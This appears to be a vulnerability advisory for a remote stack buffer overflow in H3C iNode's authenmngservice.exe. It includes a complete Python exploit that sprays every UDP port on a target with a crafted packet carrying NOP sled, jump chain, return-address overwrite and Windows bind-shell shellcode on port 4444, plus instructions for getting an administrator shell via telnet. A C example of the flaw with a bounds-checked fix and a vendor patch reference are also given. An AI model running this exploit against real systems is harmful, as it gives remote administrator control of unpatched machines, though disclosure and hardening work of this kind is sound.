H3C iNode is client software developed by Hangzhou H3C Communication Technology Co., Ltd. for user authentication and network access. The software contains a buffer overflow vulnerability: an attacker can remotely send crafted packets that trigger the overflow and execute shellcode on the host.
The vulnerability is in authenmngservice.exe, a service installed alongside the iNode software. The service runs with administrator privileges and listens on a UDP port. An attacker who can reach that port can send a crafted UDP packet, trigger the overflow and obtain a shell with the service's privileges.

Affected versions: iNode PC 5.2 (E0402), iNode PC 5.1 (E0304) and iNode PC 5.0 (E0105). Earlier versions are no longer available for download and were not tested.

In the IDA disassembly the vulnerable code is in sub_459F10, at the memcpy call at 0x45A235. The number of bytes to copy is taken from the received packet and never compared with the size of the destination buffer, so a packet carrying an oversized length field overruns the buffer and lets the attacker overwrite the saved return address with their own data. The following poc.py triggers it:
#!/usr/bin/env python3
# poc.py: sends the overflow packet to every UDP port from 1024 to 65535,
# since the port authenmngservice.exe listens on is not fixed.
import socket
import time

target = input("input attack ip addr: ")

# Bind-shell payload: listens on TCP port 4444 (0x115c) and attaches cmd.exe.
# Once the overflow succeeds, telnet to the target on port 4444.
shellcode = (
    b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31"
    b"\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52"
    b"\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
    b"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1"
    b"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52"
    b"\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
    b"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b"
    b"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b"
    b"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
    b"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b"
    b"\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3"
    b"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
    b"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b"
    b"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"
    b"\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
    b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07"
    b"\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54"
    b"\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
    b"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf"
    b"\xe0\xff\xd5\x89\xc7\x31\xdb\x53\x68\x02"
    b"\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68"
    b"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7"
    # "push 0xff38e9b7; call ebp" (listen). The page's rendering collapsed the
    # doubled \xff here; the second one is restored so the call ebp is intact.
    b"\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74"
    b"\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
    b"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00"
    b"\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59"
    b"\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
    b"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56"
    b"\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
    b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
    b"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5"
    b"\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d"
    b"\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
    b"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff"
    b"\xd5"
)

# Packet layout from the original exploit. The leading bytes are the protocol
# header the service expects; the NOP sled and shellcode fill the buffer, and the
# trailing bytes overwrite the saved return address and jump back into the sled.
exploit_data = (
    b"\x00\x01"
    + b"A" * 14
    + b"\xDA\xF4\x54\xA3\x57\xEA\xA2\x58\xFF\xA0\x61\xD7\xFB\xAF\x3C\x9C"
    + b"\x01\x01\x01\x21\x08"
    + b"\x22" * 7
    + b"\x01"
    + b"\x90" * 335            # NOP sled
    + shellcode
    # jmp rel32 back into the NOP sled. The page shows a 3-byte displacement,
    # which is not a valid E9 encoding; the trailing \xFF is assumed to be the
    # same collapsed-\xFF rendering as in the shellcode. With 5 bytes the jmp
    # short at the end of the packet lands exactly on this instruction.
    + b"\xE9\x13\xFE\xFF\xFF"
    + b"A" * 7
    + b"\xEB\xF2"              # jmp short -14: back onto the jmp rel32 above
    + b"\x90\x90"
    + b"\x71\x15\xFA\x7F"      # return address overwrite (value from the original PoC)
    + b"\x71\x15\xFA\x7F"
    + b"\x90" * 15
    + b"\xEB\xE3"              # jmp short -29: back onto the jmp short above
)

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for port in range(1024, 65536):
    s.sendto(exploit_data, (target, port))
    print("port:", port)
    time.sleep(0.001)
s.close()
print("exploit end")
input()
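The defect behind the PoC is a memcpy whose byte count is taken from the packet. The C below is an added example, not code from iNode or H3C: the wire format (one type byte, a two-byte big-endian length, then payload), the 64-byte buffer size REQ_BUF and the extra FRAME_LEN room that stands in for the saved registers after the buffer are all assumptions made for the demonstration. It shows the vulnerable pattern writing past its buffer on a constructed packet, next to a hardened handler that bounds the copy by both the destination size and the bytes actually received.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define REQ_BUF   64              /* assumed: size of the handler's local buffer     */
#define FRAME_LEN (REQ_BUF + 64)  /* constructed: room after the buffer standing in
                                     for the saved EBP / return address that the
                                     real overflow reaches                            */

/* Assumed wire format (not the real iNode protocol):
 *   byte 0     : message type
 *   bytes 1..2 : payload length, big-endian, chosen by the sender
 *   bytes 3..  : payload
 */
static size_t wire_len(const uint8_t *pkt)
{
    return ((size_t)pkt[1] << 8) | pkt[2];
}

/* Vulnerable pattern: the memcpy count is whatever the packet says it is.
 * `frame` models the handler's stack frame: the local buffer is frame[0..REQ_BUF)
 * and everything past it is whatever the service keeps after the buffer.
 * Returns the number of bytes copied. */
size_t handle_vulnerable(const uint8_t *pkt, size_t pkt_len, uint8_t frame[FRAME_LEN])
{
    if (pkt_len < 3)
        return 0;
    size_t n = wire_len(pkt);          /* attacker controlled, never compared to REQ_BUF */
    if (n > FRAME_LEN)                 /* demo only: keeps the write inside `frame`;
                                          the vulnerable service has no such cap    */
        n = FRAME_LEN;
    memcpy(frame, pkt + 3, n);         /* writes past the local buffer when n > REQ_BUF */
    return n;
}

/* Hardened version: bound the copy by the destination AND by the bytes actually
 * received, so neither a stack overflow nor an over-read of the packet is possible. */
int handle_hardened(const uint8_t *pkt, size_t pkt_len, uint8_t out[REQ_BUF], size_t *out_len)
{
    if (pkt_len < 3)
        return -1;                     /* truncated header */
    size_t n = wire_len(pkt);
    if (n > REQ_BUF)
        return -1;                     /* claimed length larger than the destination */
    if (n > pkt_len - 3)
        return -1;                     /* claimed length larger than the payload present */
    memcpy(out, pkt + 3, n);
    *out_len = n;
    return 0;
}

/* Builds a constructed packet with an oversized length field, feeds it to the
 * vulnerable handler and reports how many bytes past the local buffer were
 * overwritten with the 0x41 filler. */
size_t bytes_clobbered_past_buffer(void)
{
    uint8_t pkt[3 + FRAME_LEN];
    pkt[0] = 0x01;
    pkt[1] = (uint8_t)(FRAME_LEN >> 8);
    pkt[2] = (uint8_t)(FRAME_LEN & 0xff);
    memset(pkt + 3, 0x41, FRAME_LEN);

    uint8_t frame[FRAME_LEN];
    memset(frame, 0, sizeof frame);
    handle_vulnerable(pkt, sizeof pkt, frame);

    size_t clobbered = 0;
    for (size_t i = REQ_BUF; i < FRAME_LEN; i++)
        if (frame[i] == 0x41)
            clobbered++;
    return clobbered;
}

/* Runs the hardened handler on a constructed packet whose length field claims
 * `claimed` bytes while only `present` payload bytes are actually sent.
 * Returns the handler's result (0 = accepted, -1 = rejected). */
int hardened_result(size_t claimed, size_t present)
{
    uint8_t pkt[3 + FRAME_LEN];
    uint8_t out[REQ_BUF];
    size_t out_len = 0;
    if (present > FRAME_LEN)
        present = FRAME_LEN;
    pkt[0] = 0x01;
    pkt[1] = (uint8_t)(claimed >> 8);
    pkt[2] = (uint8_t)(claimed & 0xff);
    memset(pkt + 3, 0x41, present);
    return handle_hardened(pkt, 3 + present, out, &out_len);
}

int main(void)
{
    printf("vulnerable handler: %zu bytes written past the %d-byte buffer\n",
           bytes_clobbered_past_buffer(), REQ_BUF);
    printf("hardened handler: len 16/16 -> %d, len 128/128 -> %d, len 16/8 -> %d\n",
           hardened_result(16, 16), hardened_result(128, 128), hardened_result(16, 8));
    return 0;
}
```

The second check in handle_hardened matters as much as the first: a length field that is within the buffer size but larger than the datagram actually received makes memcpy read past the end of the packet, which is an information leak or crash rather than code execution, but is still a bug that the same length field can trigger.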
After the software is installed, authenmngservice.exe runs as administrator. Run the exploit and enter the target IP address; the attacked service keeps running rather than crashing. Then connect with telnet to port 4444 on the target: the connection succeeds and gives a remote command shell on the target system, while the attacked service still has not exited. Running calc.exe from that shell starts the calculator, and calc.exe runs with administrator privileges.
Solution: H3C has released a fix for this vulnerability and a new iNode version. Reference link: http://kms.h3c.com/kms/kms/search/view.html?Id=23553